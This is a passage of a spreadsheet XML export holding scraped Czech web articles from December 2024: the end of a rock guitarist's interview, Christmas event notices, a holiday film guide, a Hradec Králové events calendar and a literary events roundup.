tohle, stejně jako na koncerty s ním, vzpomínám moc rád. Ale tvorba byla horší. Graham měl problémy s alkoholem a hroutilo se mu manželství. Mě bylo dvaadvacet, já chtěl hrát a pařit, ale jeho s alkoholem takový život doháněl. A mimochodem, Graham se k nám připojil při našem minulém turné po Japonsku , kde jsme zahráli tři skladby a lidi se mohli zbláznit. To jsme museli udělat, protože jsme neměli dost dokončených vlastních věcí. K tomu jsme dělali „Somewhere Over The Rainbow“. Pat Torpey , který se pak přidal jako bubeník k Mr. Big, ze dne na den zařídil všechna povolení k „Somewhere Over The Rainbow“. Pak jsme ještě přemýšleli, jestli napsat nějakou další věc, ale rozhodli jsme se pro „Since You Been Gone“, jen jsme ji udělali více metalovou. Dneska bych si přál, abychom tehdy přitvrdili celkově, ve všech našich skladbách. Vlastně jsme tu dneska díky téhle změně. Co se dělo v Americe , když jsme udělali „Stand In Line“ a byli jsme v MTV , tak jsme začali na sebe strhávat pozornost, ale Skid Row , Van Halen nebo Guns N`Roses byli v Americe daleko úspěšnější, takže nás trochu vytlačili do míst jako Japonsko , kde nás přijali daleko lépe. Když jsme začali hrát s Bonnetem , vyšvihli jsme se do sedla a vytvořili si tam loajální fanouškovskou základnu. Přišla devadesátá léta a spousta skupin se začala rozpadat, protože nemohly prorazit. Všichni zkoušeli Japonsko , protože si mysleli, že to tam bude jednoduché, ale většině se to nepovedlo. My měli štěstí v tom, že už jsme měli základnu. Tehdy jsem vyhrál v japonském časopise Burrn!, což je dost velký magazín, cenu o nejlepšího rockového kytaristu i v porovnání s Eddiem Van Halenem nebo Dimebagem Darrellem . To bylo v roce 1996. Byli jsme tak populární, že jsme na jednom turné vyprodali stadion třikrát po sobě. Zároveň s námi tam hrála grungová kapela Bush, která byla v Americe populární jako blázen. My přiletěli do Japonska , a náš road manager nám navrhl, abychom se na Bush šli podívat. Tak jsme šli, nebo jsme alespoň chtěli, dokud jsme nezjistili, že se koncert ruší pro nezájem. A Bush byli hodně známí jak v Evropě , tak v USA . Vyprodávali stadiony. A my tam na tom stadionu, kde to oni nezvládli, hráli tři dny po sobě. To si myslím, že mluví samo za sebe. Rozhodně underground. Snad s výjimkou Metallicy, která je schopná mít neustále vyprodáno a dejme tomu Slipknot nebo Avenged Sevenfold, většina metalových skupin už neprorazí. Nějaké festivaly, které teď odehrál Paul se Slayer pro dvacet tisíc lidí jsou spíš nárazové akce. Ale pro nás je to ideální, protože jsme vždycky byli undergroundová kapela. Vím, že existují, ale jen nemůžu říct, které to jsou. Dneska už je nemožné pro nové hudebníky, aby prorazili. My jsme na tom velmi dobře, máme asi osmé místo mezi nejprodávanějšími kapelami v USA , ale když přemýšlíš o tom, kolik jsme vydělávali tehdy a nyní, tak je to hrozně markantní rozdíl. Malá kapela v podstatě nemůže přežít, pokud nemá nějaké zdroje, jak se nechat podporovat jinak. Určitě jsou někde druzí Iron Maiden nebo Metallica , ale člověk se o nich pravděpodobně nedozví. Asi první místo v magazínu Burrn!, a řeknu hned proč. Když někdo dneska vyhraje Grammy, tak je to často o tom, s kým se kamarádí a je to lehce manipulované. Je to jednoduší, ale když jsem vyhrál v Burrn!, tak to bylo skvělé v tom, že to není anglicky mluvící země. Musíš si to tam zasloužit a vydřít. Autor děkuje za spolupráci Tondovi Táborskému Vydáno: 01.12.2024 Autor: Jan Skala Autor person Jan Skala</t>
  </si>
  <si>
    <t>3880</t>
  </si>
  <si>
    <t>20241201_331_3473481698_212a337086fc7478c72e.html</t>
  </si>
  <si>
    <t>212a337086fc7478c72e</t>
  </si>
  <si>
    <t>Štědrovečerní setkání před Půlnoční mší</t>
  </si>
  <si>
    <t>Štědrovečerní setkání před Půlnoční mší Kdy: 24. 12. 2024 23:30 – 25. 12. 2024 Kde: MKIS Poběžovice MKIS Poběžovice vás zve do infocentra 24.12. od 23:30 hodin na přátelské Štědrovečerní setkání při Betlémském světle, svařáku, čaji a vánočních koled před půlnoční mší. Typ akce: ostatní (akce pro veřejnost, nespecifikováno/ostatní) Srdečně Vás zveme na Štědrovečerní setkání před Půlnoční mší. Přijďte nasát sváteční atmosféru, zazpívat si koledy, zahřát se voňavým svařeným vínem nebo horkým čajem. Převzít si můžete také Betlemské světlo, které si můžete donést do svých domovů. Po setkání Vás zveme na tradiční Půlnoční mši do kostela Nanebevzetí Panny Marie v Poběžovicích , kde přivítáme vánoční svátky a narození Ježíška. Těšíme se na Vás a na společně prožité chvíle naplněné klidem a radostí. MKIS Poběžovice, náměstí Míru 210 Doba trvání: 30 minut Datum vložení: 18. 11. 2024 15:23 Datum poslední aktualizace: 18. 11. 2024 15:38 Autor: Správce Webu Autor: Autor: || Město Poběžovice || Správce Webu</t>
  </si>
  <si>
    <t>20241201_332_3473483326_85bf0590e73a67419950.html</t>
  </si>
  <si>
    <t>85bf0590e73a67419950</t>
  </si>
  <si>
    <t>Vánoční tvoření</t>
  </si>
  <si>
    <t>Vánoční tvoření Městské muzeum a galerie Nepomuk Ukázat na mapě Přijďte si s dětmi vyrobit vlastní originální vánoční ozdoby na stromeček z dřevěných výřezů! Zdobit je můžete korálky , glitrovým lepidlem či kuličkami z krepového papíru. Další ozdoby můžete vytvořit pomocí barevných přízí a stužek. Všechny materiály a pomůcky ke zdobení budou na místě k dispozici zdarma, jedna dřevěná vánoční ozdoba na tvoření Vás vyjde 30 Kč. Odhadovaná doba tvoření jedné vánoční ozdoby je 5 – 15 minut. Autor: Beneš &amp;amp; Michl, www.benes-michl.cz</t>
  </si>
  <si>
    <t>535000</t>
  </si>
  <si>
    <t>20241201_333_3473480776_109794578c950af8ab3e.html</t>
  </si>
  <si>
    <t>109794578c950af8ab3e</t>
  </si>
  <si>
    <t>Kde a co vybrat ke sledování během Vánoc?</t>
  </si>
  <si>
    <t>Shrnutí Kde a co vybrat ke sledování během Vánoc? Film Grinch (2000) Ron Howard Vánoční čas je ideálním obdobím, kdy se na chvíli zastavit. Nezáleží na tom, jestli odpočíváte sami, s rodinou, přáteli či domácím mazlíčkem. Hlavní je, alespoň na pár hodin, zapomenout na všechny starosti a navrátit se do dětských let. Ideálním prostředkem k tomu mohou být filmy. Kromě animovaných či hraných klasik máme pro rok 2024 i několik novinek, které byste si neměli nechat ujít. Přinášíme vám přehled vánočních filmů, které letos stojí za to vidět, společně s doporučením, kde je najdete. Klasiky, které neomrzí Sám doma ( Home Alone, 1990 ) - Nesmrtelná klasika o malém Kevinovi, kterého zapomněli rodiče doma, a který musí sám ubránit svůj domov před zloději, patří mezi nejoblíbenější vánoční filmy. K dispozici je na platformě Disney+. Láska nebeská ( Love Actually, 2003 ) - Romantická komedie sledující příběhy několika párů během Vánoc. Skvělý mix humoru a emocí, který najdete na Netflixu nebo HBO Max. Grinch ( How the Grinch Stole Christmas, 2000 ) - Brilantní Jim Carrey jako Grinch, který nesnáší Vánoce a rozhodne se je Kdovíkům ukrást. Grinch je dostupný na HBO Max a také na Netflixu. Vánoční koleda ( A Christmas Carol, 2009 ) - Tento nadčasový příběh o lidské chamtivosti a nápravě jednoho lakomce podle povídky Charlese Dickense má mnoho filmových adaptací. Animovaná verze z roku 2009 s již zmíněným talentem Jimem Carreym je dostupná na Disney+. Sám doma (1990) Chris Columbus Nové vánoční filmy 2024 Meet Me Next Christmas - Romantická komedie s Christinou Milian sleduje příběh Layly, která v New Yorku hledá lístek na koncert slavné skupiny Pentatonix . Premiéru má 6. listopadu na Netflixu. Hot Frosty - Komedie s Lacey Chabert , která hraje vdovu Kathy, jež přivede k životu sněhuláka a zažije s ním romantické Vánoce předtím, než nový společník roztaje. Na Netflixu od 13. listopadu. The Merry Gentlemen - Chad Michael Murray v příběhu muže, který pomáhá zachránit vánoční show a zároveň nečekaně najde lásku. Tento film přichází na Netflix 20. listopadu. Our Little Secret - Lindsay Lohan a Ian Harding v příběhu dvou ex-manželů, kteří zjistí, že jejich noví partneři jsou sourozenci. Toto vánoční šílenství najdete od 27. listopadu na Netflixu. That Christmas - Animovaný rodinný film o přátelství, osamělosti a rodině, ale také o jedné Santově chybě, který má premiéru 6. prosince a slibuje zábavu pro všechny. Carry-On - Akční thriller s Taronem Egertonem odehrávající se během vánoční sezóny na letišti; premiéra je na Netflixu naplánována na prosinec. Láska nebeská (2003) Richard Curtis Doporučení na zajímavé vánoční filmové večery Aby vaše filmové večery získaly ten správný vánoční nádech, můžete zvolit různé tematické okruhy - maratony - a doplnit je třeba vánočními dekoracemi, svařeným vínem či domácím cukrovím. Zde je několik nápadů: České klasiky - Tuzemské snímky oceňuje především starší generace, to jim ale neubírá na kouzlu. Na iVysílání je dostupná většina časem prověřených klasik. Například oba díly Anděla Páně (2005, 2016), Korunní princ (2015), Sedmero krkavců (1993), Dvanáct měsíčků (2012) či Lotrando a Zubejda (1998). Na Štědrý večer si pak můžete na programu ČT1 pustit novinku Tři princezny režiséra Tomáše Pavlíčka . Maraton vánočních komedií - Pokud máte chuť na komedie, které vás opravdu rozesmějí, doporučujeme začít s již zmíněným snímkem Sám doma (1990), pokračovat Grinchem (2000) a zakončit večer letošní novinkou Our little secret na Netflixu. Animovaný večer pro rodinu - Dejte šanci animovaným pohádkám, jako je Vánoční koleda (2009) nebo Polární expres (2004) na Netflixu. Pro fajnšmekry, kteří se nebojí, doporučuji Ukradené Vánoce Tima Burtona (1993) dostupné na Disney+ či AppleTV. Romantické Vánoce - Toužíte-li po romantickém večeru, pak by na vašem seznamu neměla chybět klasika Láska nebeská (2003, Netflix ) a Last Christmas (2019, Apple TV ). Doufáme, že si vánoční filmy užijete a že vám tento přehled pomůže najít inspiraci pro krásné chvíle s vašimi blízkými. Veselé Vánoce. Anděl Páně (2005) Jiří Strach Mohlo by vás zajímat Na jedné straně téma dospívání, sobectví a hledání vlastní cesty, na... Recenze Než se říjen s listopadem sešel, konkrétně 25. října, vydala známá... Článek Poslední listopadový víkend se stal svátkem pro všechny milovníky knih... Rozhovor Autor: Adam Kašpárek Autor person Adam Kašpárek</t>
  </si>
  <si>
    <t>950</t>
  </si>
  <si>
    <t>286</t>
  </si>
  <si>
    <t>20241201_334_3473480783_1b04c8669d0dd1e01465.html</t>
  </si>
  <si>
    <t>1b04c8669d0dd1e01465</t>
  </si>
  <si>
    <t>Kalendarium SETKÁNÍ S LITERATUROU 05.prosinec - čtvrtek od 10:00 hodin Další z pravidelných komponovaných literárních pořadů zvukové knihovny, ve kterém jsou představovány nové tituly na CD-MP3. Pořad je určen uživatelům zvukové knihovny pro nevidomé a slabozraké. Vstup volný. SALON VÝCHODOČESKÉ FOTOGRAFIE (PROHLÍDKA) 05.prosinec - čtvrtek od 10:00 hodin Zveme Vás na reprezentativní přehlídku Salon východočeské fotografie, která poskytuje souhrnný přehled aktuální tvorby východočeských fotografů. Tato přehlídka se opakuje po třech letech a toto trienále se stalo tradicí a vyhledávanou příležitostí prezentovat své fotografické dílo. Salon východočeské fotografie se poprvé konal v roce 2005 v Muzeu východních Čech v Hradci Králové . V roce 2024 proběhne již sedmý ročník. Vstup volný. PEKELNÁ STEZKA V ORLICI 05.prosinec - čtvrtek od 15:00 hodin Přijďte si užít mikulášské dobrodružství plné zábavy a úkolů! Letos jsme pro vás připravili novou vánoční hledačku a pekelnou stezku, kterou zvládnou jen ti nejodvážnější. Na děti čeká průchod nebeskou bránou s anděly, vážení hříšníků s čerty, hra o duši u čertovského kotle a kreativní tvoření v nebeských dílničkách. Za splněné úkoly získají razítka a na závěr diplom jako odměnu za svoji odvahu. Harmonogram akce: 15:00 – Začátek programu 16:00 – Divadelní představení Betlém LI(F/V)E 18:00 – Losování cen 19:00 – Ukončení akce Přijďte si s dětmi užít kouzelné odpoledne plné zábavy a vánoční atmosféry. Těšíme se na vás! ČERT A MIKULÁŠ 05.prosinec - čtvrtek od 15:00 hodin Zveme vás na pohádkové odpoledne plné zábavy, smíchu a kouzelné adventní atmosféry a hlavně na čerta, Mikuláše a anděla! Co vás čeká? Mikuláš s andělem budou rozdávat dárečky hodným dětem. Čert, který možná někoho trochu postraší (ale jen malinko). Dobroty a teplé nápoje k zakousnutí i zahřátí. Nezapomeňte, dobroty si užijí nejen hodné děti – čert má také smysl pro humor! Těšíme se na vás v parku Na Větvi SETKÁNÍ S MIKULÁŠEM A JEHO DOPROVODEM 05.prosinec - čtvrtek od 15:30 hodin Pro nejmenší děti v doprovodu rodičů jsme připravili oblíbené setkání s Mikulášem a jeho doprovodem. Akce proběhne ve vnitřním dvoře budovy CZŠ, ve které sídlí KRC Sedmikráska. Je tedy třeba se teple obléknout. Balíčky s nadílkou budou zajištěny. Vstupné 50 Kč/rodina. Jednotlivé rodiny budou mít vyhrazený vlastní čas setkání. Je třeba se přihlásit nejpozději do neděle 1. prosince přes: MIKULÁŠSKÝ TROLEJBUS 05.prosinec - čtvrtek od 15:35 hodin V předvečer svatého Mikuláše budeme všichni v dopravním podniku s napětím očekávat, jestli i letos dorazí naši staří známí Mikuláš, anděl a čerti. Každopádně je zkusíme opět nalákat na vyzdobený trolejbus. Snad ho z nebe uvidí! My věříme, že všichni dorazí, a proto jsme již dopředu nachystali trasu, kterou pohodlně objedou celý Hradec . První zastávkou Mikulášského trolejbusu bude v 15:35 Alessandria . Jízda bude pokračovat dle řádu až do 18:20. Na zastávkách Nový Hradec Králové, Terminál HD, Malšovice – U Čechů a Alessandria (na konci trasy) se kouzelné postavy zdrží kolem 20 minut. Pro Mikuláše a anděla si děti mohou připravit i hezkou básničku, písničku nebo obrázek. Oba to určitě rádi ocení drobným dárkem. A všichni se s dětmi rádi vyfotí. Mikulášský trolejbus pořádá Dopravní podnik města Hradce Králové už od roku 1990 s krátkou přestávkou v období pandemie. S touto tradicí přišel před 34 lety jako první dopravní podnik v České republice . Jízdní řád Mikulášského trolejbusu 5. prosince 2024 15.35 Alessandria (zast.l.č.6 směr Hlavní nádraží) 15.38 Pyrám (směr Hlavní nádraží) 15.40 Průmyslová škola (směr Hlavní nádraží) 15.43 Komenského (směr Nový Hradec Králové) 15.46 Zimní stadion (směr Nový Hradec Králové) 15.51 Hotel Garni (směr Nový Hradec Králové) 15.54 Futurum (směr Nový Hradec Králové) 15.57 Na Brně (směr Nový Hradec Králové) 16.00 Na Plachtě (směr Nový Hradec Králové) 16.02 Zvonička (směr Nový Hradec Králové) 16.05 NOVÝ HRADEC KRÁLOVÉ 16.25 NOVÝ HRADEC KRÁLOVÉ 16.28 Zvonička (směr Hlavní nádraží) 16.31 Na Plachtě (směr Hlavní nádraží) 16.33 Na Brně (směr Hlavní nádraží) 16.35 Futurum (směr Hlavní nádraží) 16.37 Moravské Př. I (směr Hlavní nádraží) 16.39 Hotel Garni (směr Hlavní nádraží ) 16.44 Zimní stadion (směr Hlavní nádraží) 16.46 Komenského (směr Hlavní nádraží) 16.49 Magistrát města (směr Hlavní nádraží) 16.51 Muzeum (směr Hlavní nádraží) 16.54 Centrál (směr Hlavní nádraží) 16.57 OD TESCO a ATRIUM (směr Hl. n.) 17.00 HLAVNÍ NÁDRAŽÍ nástupiště H 17.01 TERMINÁL HD nástupiště B 17.20 TERMINÁL HD nástupiště C1 17.21 HLAVNÍ NÁDRAŽÍ nástupiště D 17.23 OD TESCO a ATRIUM (směr centrum) 17.26 Centrál (směr Magistrát města ) 17.29 Muzeum (směr Magistrát města ) 17.32 Magistrát města (směr Malšovice) 17.35 Stará nemocnice (směr Malšovice) 17.38 Na kotli (směr Malšovice) 17.40 Náhon (směr Malšovice) 17.42 Husův pomník (směr Malšovice) 17.44 MALŠOVICE - U ČECHŮ 18.05 MALŠOVICE - U ČECHŮ 18.07 Husův pomník (směr Hlavní nádraží) 18.09 Náhon (směr Hlavní nádraží) 18.11 Na kotli (směr Hlavní nádraží) 18.14 Stará nemocnice (směr Hlavní nádraží) 18.16 Průmyslová škola (směr Slezské Před.) 18.18 Pyrám (směr Slezské Před.) 18.20 ALESSANDRIA KOUZLO MIKULÁŠSKÉ NOCI 05.prosinec - čtvrtek od 16:00 hodin Stejně jako každý rok na vás čeká veselý příběh, ve kterém se potkáte s důstojným Mikulášem , bláznivým čertem a popleteným andílkem. To, že je Mikulášská noc kouzelná, je každému jasné. Ale co se přihodí naší trojici, vás určitě překvapí. Po divadélku následují veselé hrátky, tvoření a mikulášská nadílka na dětském oddělení U Velryby. Vstupné dobrovolné. MIKULÁŠSKÁ A KRAMPUS SHOW 05.prosinec - čtvrtek od 16:00 hodin Peklo v Orlici na zahrádce, příchod strašidelného průvodu v 17 hod. Těšit se můžete na 18 masek - strašidelní čerti, Mikuláš , andělé, čarodějnice a další masky. Přijďte vychutnat pekelnou předvánoční atmosféru, dát si svařené víno , horkou medovinu nebo svařený hruškový džus u venkovního stánku. Můžete vzít i balíčky pro děti, Mikuláš je dětem předá. Vstup volný. 05.prosinec - čtvrtek od 17:00 hodin zábavná show pro potěr, dorost i dospěláky 0 | Velké náměstí | Velké náměstí 2024-12-05 17:00:00 2024-12-05 18:00:00 Vernisáž 05.prosinec - čtvrtek od 17:00 hodin Miloslav Polcar (1947) studoval na VŠUP v Praze v ateliéru monumentální malby Zdeňka Sklenáře . Jako Docent vyučoval kresbu a grafiku na Pedagogické fakultě UK. Je dvojnásobným laureátem ceny Grafika roku, v loňském roce získal Cenu Vladimíra Boudníka . Je autorem objektů a autorských knih. Jeho tématem je osobní archeologie, abstrakce, otisk, kaligrafie, písmo. Využívá matrice ze styroduru, izolačního materiálu, upraveného polystyrenu. Devět matric pro lept a rytinu bude vystaveno. Jan Měřička (1955) se narodil v Pardubicích a studoval v Hradci Králové farmaceutickou fakultu. Věnuje se volné grafické tvorbě, působí jako externí pedagog na Katedře fotografie FAMU a provozovatel Galerie 50°47’55.9”N 14°57’22. 6” E v Andělské Hoře u Chrastavy . Za grafickou tvorbu získal mj. Cenu Vladimíra Boudníka . Žije v Křižanech v Podještědí . Grafika Jana Měřičky je paměťové médium, pracuje se záznamy a modely situací. Jeho tématem je hemžení davů i hybnost přírody. V grafických technikách matrice stoprocentně určuje výsledný otisk. Miloslav Polcar matrici vnímá volněji, jako předobraz tisku, či předtext. Je pro něj výzvou čar, křivek a přímek. Grafik se mnoho hodin věnuje přípravě matrice, z níž otisk vzniká paradoxně rychle. Matrice je tím dílem, objektem, v němž jsou uloženy hodiny času, přemýšlení a dotýkání. Je to hmota, do níž je investováno na způsob sochařského díla kus zkušenosti, jež se zdá v otisku snad až příliš abstraktní. Jan Měřička během loňské první cesty na kole podél Labe k moři studoval vodní živel, vlnění mořské hladiny. Během druhé cesty prozkoumal povahu řeky, stromy, chumle jehličí. Výsledný grafický záznam znovu vyvolává zážitek, čas, živost vody, do níž nelze vstoupit dvakrát. Jak o tom hovoří Fragment B91 předsokratovského filozofa, temného Hérakleita z Efesu . Zásadním principem světa je i podle Aristotela změna. Martina Vítková 0 | Galerie ART patro, 3. patro levé budovy Magistrátu města HK | Město Hradec Králové Galerie ART patro, 3. patro levé budovy Magistrátu města HK 2024-12-05 17:00:00 2024-12-05 17:00:00 (VERNISÁŽ) MILOSLAV POLCAR -PŘEDTEXTY, JAN MĚŘIČKA -FRAGMENT B 91 05.prosinec - čtvrtek od 17:00 hodin Miloslav Polcar (1947) studoval na VŠUP v Praze v ateliéru monumentální malby Zdeňka Sklenáře . Jako Docent vyučoval kresbu a grafiku na Pedagogické fakultě UK. Je dvojnásobným laureátem ceny Grafika roku, v loňském roce získal Cenu Vladimíra Boudníka . Je autorem objektů a autorských knih. Jeho tématem je osobní archeologie, abstrakce, otisk, kaligrafie, písmo. Využívá matrice ze styroduru, izolačního materiálu, upraveného polystyrenu. Devět matric pro lept a rytinu bude vystaveno. Jan Měřička (1955) se narodil v Pardubicích a studoval v Hradci Králové farmaceutickou fakultu. Věnuje se volné grafické tvorbě, působí jako externí pedagog na Katedře fotografie FAMU a provozovatel Galerie 50°47’55.9”N 14°57’22. 6” E v Andělské Hoře u Chrastavy . Za grafickou tvorbu získal mj. Cenu Vladimíra Boudníka . Žije v Křižanech v Podještědí . Grafika Jana Měřičky je paměťové médium, pracuje se záznamy a modely situací. Jeho tématem je hemžení davů i hybnost přírody. V grafických technikách matrice stoprocentně určuje výsledný otisk. Miloslav Polcar matrici vnímá volněji, jako předobraz tisku, či předtext. Je pro něj výzvou čar, křivek a přímek. Grafik se mnoho hodin věnuje přípravě matrice, z níž otisk vzniká paradoxně rychle. Matrice je tím dílem, objektem, v němž jsou uloženy hodiny času, přemýšlení a dotýkání. Je to hmota, do níž je investováno na způsob sochařského díla kus zkušenosti, jež se zdá v otisku snad až příliš abstraktní. Jan Měřička během loňské první cesty na kole podél Labe k moři studoval vodní živel, vlnění mořské hladiny. Během druhé cesty prozkoumal povahu řeky, stromy, chumle jehličí. Výsledný grafický záznam znovu vyvolává zážitek, čas, živost vody, do níž nelze vstoupit dvakrát. Jak o tom hovoří Fragment B91 předsokratovského filozofa, temného Hérakleita z Efesu . Zásadním principem světa je i podle Aristotela změna. Martina Vítková RM: Right People, Wrong Place 05.prosinec - čtvrtek od 17:30 hodin RM, leader K-popové skupiny BTS , přináší do kin svůj velmi osobní film, ve kterém se jako RM i jako Kim Namjoon poprvé fanouškům upřímně otevírá. Film sleduje osm měsíců vedoucích k nástupu slavného rappera do vojenské služby a proces tvorby jeho druhého sólového alba s názvem „Right Place, Wrong Person“, ve kterém reflektuje své pocity a emoce. Připojte se k ARMY z celého světa a společně odhalte dosud nepoznanou tvář tohoto hvězdného interpreta. 270 vstupné 270 Kč | Malý sál | Bio Central Malý sál 2024-12-05 17:45:00 2024-12-05 19:15:00 Andy Warhol – The American DreamAndy Warhol – americký sen 05.prosinec - čtvrtek od 17:45 hodin Příběh o tom, jak se Andy Warhol , syn slovenských imigrantů v USA , stal ikonou 20. století a zařadil se mezi pár osobností, které měly globální přesah a kompletně změnily náhled na umění. Jeho životní příběh je fascinující, z věčně neduživého chlapce žijícího ve slovanském ghettu v Pittsburghu se stal jedním z nejvlivnějších umělců všech dob – mezi osobnosti, se kterými spolupracoval, patří mimo jiné Marilyn Monroe, John Wayne , Mick Jagger nebo Liz Taylor . Jak se mu podařilo dosáhnout až na vrchol uměleckého světa a co nejvíce ovlivnilo jeho tvorbu? Málo se ví o tom, jak velký vliv na jeho tvorbu měla rusínská kultura a zejména hluboká víra v Boha, ke které se obracel až do své smrti. První část filmu se ale vrací do dávné minulosti, kdy z chudých částí Zakarpatské Rusi a východu Slovenska odcházely stovky mužů i žen za prací do Ameriky a dalších částí světa. Byli mezi nimi i Ondřej Varchola a jeho žena Julie, budoucí rodiče Andyho Warhola . Věděli, že jim se amerického snu dosáhnout nepodaří, zasvětili ale celý život tomu, aby vybudovali lepší podmínky pro svého syna, kterému se tak již v útlém věku otevřely dveře do světa umění. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-05 18:00:00 2024-12-05 20:00:00 05.prosinec - čtvrtek od 18:00 hodin Přijďte si užít mikulášský večer plný živé hudby do PETROF Café! Již 5. prosince vás čeká kapela Streyci, která přinese čertovský repertoár plný pestrých českých a zahraničních popových hitů. Kapela, která byla založena kolem roku 2001, se během své existence stala oblíbenou volbou pro plesy, taneční zábavy a jiné akce. V současném složení, které zahrnuje akustickou kytaru, elektrickou kytaru, baskytaru, klávesy, bicí a zpěv, hraje už asi dva roky. Přijďte si užít mikulášskou atmosféru s jejich energickým vystoupením. Vstup Rezervace nutná předem telefonicky na +420 725 896 236 nebo přímo v kavárně. 150 Kč (vstupenky lze zakoupit pouze při příchodu na kavárenský koncert). Kapacita omezena. Není možné si rezervovat konkrétní stůl v kavárně. Usazování hostů vždy řešíme s ohledem na počet rezervací. Přijďte prosím s dostatečnou časovou rezervou. 0 | Petrof Café, Na Brně 1955, 500 06 HK | PETROF Gallery Petrof Café, Na Brně 1955, 500 06 HK 2024-12-05 18:00:00 2024-12-05 20:00:00 JIŘÍ ŠLITR 05.prosinec - čtvrtek od 18:00 hodin Přijďte se dozvědět více o životě a tvorbě legendárního skladatele, zpěváka, výtvarníka a herce Jiřího Šlitra . Hudební beseda vás provede jeho uměleckou dráhou, osobními zážitky a zásadními momenty, které ovlivnily českou hudební scénu. Připomeneme si nejen 100. výročí narození Jiřího Šlitra , ale i nestárnoucí hity divadla Semafor . Vstupné dobrovolné. Koncertní řada Bílá 05.prosinec - čtvrtek od 19:30 hodin Toužíte po klidném, idylickém životě? Právě takový opěvuje nejčistší romantik Fibich svou konejšivou písní o štěstí a lásce, Dvořák půvabnou "americkou" suitou a Martinů newyorskou symfonií svobody z nejkrásnějšího jara roku 1945. SYMFONIE RADOSTI DVOŘÁK SUITA PRO ORCHESTR A DUR MARTINŮ SYMFONIE Č. 4 Filharmonie Hradec Králové Petr Altrichter dirigent 490 vstupné 200 Kč, 490 Kč | Sál Filharmonie Hradec Králové | Filharmonie Hradec Králové Sál Filharmonie Hradec Králové 2024-12-05 19:30:00 2024-12-05 19:30:00 05.prosinec - čtvrtek od 19:30 hodin Komedie N. V. Gogola v novém hávu a v režii Jany Portykové. The Lord of the Rings: The War of the Rohirrim 05.prosinec - čtvrtek od 20:00 hodin Děj filmu PÁN PRSTENŮ: VÁLKA ROHIRŮ se odehrává 183 let před událostmi, o nichž pojednává původní trilogie, a vypráví příběh rodu Helma Kladiva, legendárního krále Rohanu. Náhlý útok vychytralého a nemilosrdného náčelníka Vrchovců Wulfa, jenž touží pomstít smrt svého otce, přinutí Helma a jeho lid k odvážné obraně v prastaré pevnosti zvané Hláska, jež se nachází v údolí, kterému se od té doby říká Helmův žleb. Ve stále zoufalejší situaci musí Helmova dcera Héra prokázat silnou vůli a odolat strašlivému nepříteli, který si chce podrobit ji i její lid. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-05 20:30:00 2024-12-05 22:13:00 Miséricorde 05.prosinec - čtvrtek od 20:30 hodin Jérémie se vrací do Saint-Martial na pohřeb svého bývalého šéfa, pekařského mistra. Na několik dní se ubytuje u jeho vdovy Martine. Ovšem to, co mělo být původně krátkým pobytem na venkově, nabere zcela nečekaný směr: nejprve dojde k jednomu záhadnému zmizení, poté se objeví hrozba v podobě souseda a nakonec ještě duchovní s poněkud překvapivými úmysly. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241201_335_3473474347_84c7eeb6919632998658.html</t>
  </si>
  <si>
    <t>84c7eeb6919632998658</t>
  </si>
  <si>
    <t>Nenechte si ujít v týdnu od 2. do 8. prosince 2024</t>
  </si>
  <si>
    <t>Nenechte si ujít v týdnu od 2. do 8. prosince 2024 1.12.2024 Ivana Bez komentáře Chcete si zpříjemnit první prosincové dny nějakou literární akcí? Opět pro vás máme jejich přehled. Za návštěvu jistě stojí autorské čtení Petra Čorneje a beseda s Martinem Moravcem či Miroslavem Hlaučem. Baví vás psaní, ale zatím píšete jen „do šuplíku“? Nebo patříte k publikujícím autorům? Využijte příležitost, kterou nabízí Regionální knihovna Karviná , a v pondělí 2. prosince seznamte se svou tvorbou další literární nadšence. Setkání začíná v zasedací místnosti v 16.00. Příznivci Martina Moravce by měli ve středu 4. listopadu zavítat do Brna . Koná se zde totiž beseda s tímto novinářem a autorem několika biografií slavných osobností. Mezi jeho díla patří např. Jiná Gabriela Koukalová , Josef Mareš : Moje případy z 1. oddělení, Mezi nebem a pacientem či nejnověji také Adam Dolník : Svět elitního vyjednavače. Chcete-li lépe poznat jeho tvorbu, přijďte v 17.00 do knihkupectví Knihy Dobrovský v Brně „na Čáře“. V Krajské knihovně v Pardubicích se ve středu 4. prosince uskuteční beseda se spisovatelem Miroslavem Hlaučem. Představí vám svůj román Letnice, v níž se dotýká otázek identity, víry a mezilidských vztahů. Autor také přiblíží inspiraci, která ho vedla k napsání tohoto hluboce působivého románu, a podělí se o své zkušenosti z literárního procesu. Beseda poskytne prostor pro otázky čtenářů, kteří se mohou dozvědět více o literárních technikách, ale i o osobních zkušenostech autora, jež se promítly do příběhu. Buďte v univerzálním sále v 17.00. Městská knihovna v Praze připravila na stejný den, tedy na středu 4. prosince, autorské čtení Petra Čorneje . Nejprve vás seznámí se svou životní cestou – včetně badatelského a učitelského působení. Poté přiblíží proces, jakým vznikají jeho texty, které se vyznačují sdělností a vstřícností vůči čtenářům. Především ale představí formou ukázek a komentářů své nejvýznamnější knihy ( Tajemství českých kronik ; Jan Žižka . Život a doba husitského válečníka ; Husitská revoluce. Stručná historie ; Spory o Jana Žižku 1424– 2024 ; Husité na Žižkově . Pomíjivá paměť pražské periferie ; Pekařův Žižka ). Přijďte do ústřední knihovny v 17.30. A přesuneme se do Plzně , kde se ve středu 4. prosince můžete setkat s jedním z nejprodávanějších autorů české fantastiky Františkem Kotletou (čili Leošem Kyšou ). Mluvit bude nejen o svých knihách (napsal např. Sudetenland, Underground: Revoluce, Rázová vlna, Poločas rozpadu či Příliš dlouhá swingers party ). Setkání začíná v sále beletrie Studijní a vědecké knihovny Plzeňského kraje v 17.30. Nyní se podíváme do Skutče , kde se ve středu 4. prosince uskuteční promítání filmu Zápisník alkoholičky. Natočen byl podle stejnojmenné knihy, kterou napsala Michaela Duffková. Po filmu bude následovat i diskuze, které se zúčastní regionální adiktolog – dozvíte se tedy mnoho užitečných informací o závislosti žen na alkoholu . Začátek je v kulturním klubu v 19.00. V Městské knihovně v Praze proběhne ve čtvrtek 5. prosince beseda se třemi spisovateli: Markétou Harasimovou , Petrou Nachtmanovou a Josefem Pepsonem Snětivým. Představí vám knihu Šťastné a chlupaté… Vánoce!. Chcete vědět, jaké povídky v ní najdete? Tak buďte na pobočce Hradčany v 17.17. Pokud víte o nějaké další zajímavé literární akci, podělte se o ni s námi v našem Kalendáři akcí. Doporučení: Pro přidání komentáře musíte být přihlášeni. Aukce Autor: Ivana</t>
  </si>
  <si>
    <t>217</t>
  </si>
  <si>
    <t>137</t>
  </si>
  <si>
